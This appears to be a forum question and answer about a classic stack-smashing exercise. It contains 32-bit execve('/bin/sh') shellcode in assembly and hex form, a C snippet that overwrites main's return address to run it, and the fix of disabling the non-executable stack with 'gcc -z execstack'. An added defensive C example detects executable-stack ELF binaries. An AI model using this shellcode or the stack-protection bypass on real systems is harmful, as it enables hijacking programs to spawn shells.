I have been trying to understand how stack overflow attacks work. So far I can successfully redirect the return address to an instruction inside the original code. I have written a shellcode launcher in assembly and got it to work inside a C program. By debugging with gdb, I obtained the hex representing the shellcode launcher, and the C program works fine. Yet when I try to inject this hex string in another program I get the segmentation error. When I trace the return address, I realize that it was successfully set to point to the hex string before the program exits. Snapshots show the steps. I am not able to figure out why the injection does not work, given the fact that the same code can create the shell in assembly and the return address of the main function was set to point to sc (the string that creates the new shell).

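    #include <stdio.h>
    void main(){
        asm(
            "xorl %eax,%eax;"       /* eax = 0 */
            "pushl %eax;"           /* string terminator */
            "pushl $0x68732f2f;"    /* "//sh" */
            "pushl $0x6e69622f;"    /* "/bin" */
            "movl %esp,%ebx;"       /* ebx = pointer to "/bin//sh" */
            "pushl %eax;"           /* argv[1] = NULL */
            "pushl %ebx;"           /* argv[0] = pointer to the path */
            "movl %esp,%ecx;"       /* ecx = argv */
            "movl %eax,%edx;"       /* edx = envp = NULL */
            "movb $0x0b,%al;"       /* syscall number 11 (execve) */
            "int $0x80;"            /* enter the kernel */
        );
    }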

When I compile and run the above C code that includes assembly, it runs perfectly fine. I obtained the hex of the asm code in the C program above using gdb and generated the following stack smash code.

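    /* bytes of the asm block above, as obtained with gdb */
    char sc[]=
        "\x31\xc0\x50\x68\x2f\x2f\x73"
        "\x68\x68\x2f\x62\x69\x6e"
        "\x89\xe3\x50\x53\x89\xe1"
        "\x89\xc2\xb0\x0b\xcd\x80";
    void main(){
        int *ret;
        ret=(int *)&ret+2;   /* two ints above ret: the saved return address of main */
        (*ret)=(int)sc;      /* make main return into sc */
    }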

When I run the code I get the following error:

    Program received signal SIGSEGV, Segmentation fault.
    0x0804a01c in sc ()

1 Answer

Solved it. The problem is that the stack was not executable. Turns out you can make the stack executable with "gcc -z execstack".
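Added example, not part of the original answer: `-z execstack` is recorded in the binary as the execute bit on the `PT_GNU_STACK` program header, so a build or audit step can detect binaries that request an executable stack. The function names `stack_exec_state` and `make_sample` are hypothetical, and the ELF images it runs on are constructed in memory rather than taken from a real build.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PT_GNU_STACK 0x6474e551u  /* program header type carrying stack permissions */
#define PF_X 0x1u                 /* execute bit in p_flags */

static uint64_t rd(const unsigned char *p, int n) {  /* little-endian read of n bytes */
    uint64_t v = 0;
    while (n--) v = (v << 8) | p[n];
    return v;
}

/* 1: stack requested executable, 0: non-executable, 2: no PT_GNU_STACK, -1: unparseable */
int stack_exec_state(const unsigned char *img, size_t len) {
    if (len < 52 || memcmp(img, "\x7f" "ELF", 4) != 0 || img[5] != 1) return -1;
    int is64 = (img[4] == 2);
    if ((!is64 && img[4] != 1) || (is64 && len < 64)) return -1;
    uint64_t phoff = is64 ? rd(img + 32, 8) : rd(img + 28, 4);
    uint64_t entsz = rd(img + (is64 ? 54 : 42), 2);
    uint64_t phnum = rd(img + (is64 ? 56 : 44), 2);
    for (uint64_t i = 0; i < phnum; i++) {
        uint64_t off = phoff + i * entsz;
        /* reject a truncated or out-of-range program header table */
        if (phoff > len || off > len || len - off < (is64 ? 56u : 32u)) return -1;
        if (rd(img + off, 4) == PT_GNU_STACK)  /* p_flags sits at +4 (ELF64) or +24 (ELF32) */
            return (rd(img + off + (is64 ? 4 : 24), 4) & PF_X) ? 1 : 0;
    }
    return 2;  /* header absent: the kernel/architecture default decides */
}

/* Constructed sample: minimal 32-bit little-endian ELF header + one PT_GNU_STACK entry. */
size_t make_sample(unsigned char *buf, uint32_t flags) {
    memset(buf, 0, 84);
    memcpy(buf, "\x7f" "ELF\x01\x01\x01", 7);  /* ELFCLASS32, ELFDATA2LSB, version 1 */
    buf[28] = 52;                               /* e_phoff: right after the header */
    buf[42] = 32; buf[44] = 1;                  /* e_phentsize, e_phnum */
    for (int i = 0; i < 4; i++) {
        buf[52 + i] = (PT_GNU_STACK >> (8 * i)) & 0xff;  /* p_type */
        buf[76 + i] = (flags >> (8 * i)) & 0xff;         /* p_flags */
    }
    return 84;
}

int main(void) {
    unsigned char img[84];
    printf("RW  stack: %d\n", stack_exec_state(img, make_sample(img, 0x6)));
    printf("RWX stack: %d\n", stack_exec_state(img, make_sample(img, 0x7)));
    return 0;
}
```

On a real binary, `readelf -lW` shows the same flags on the `GNU_STACK` line.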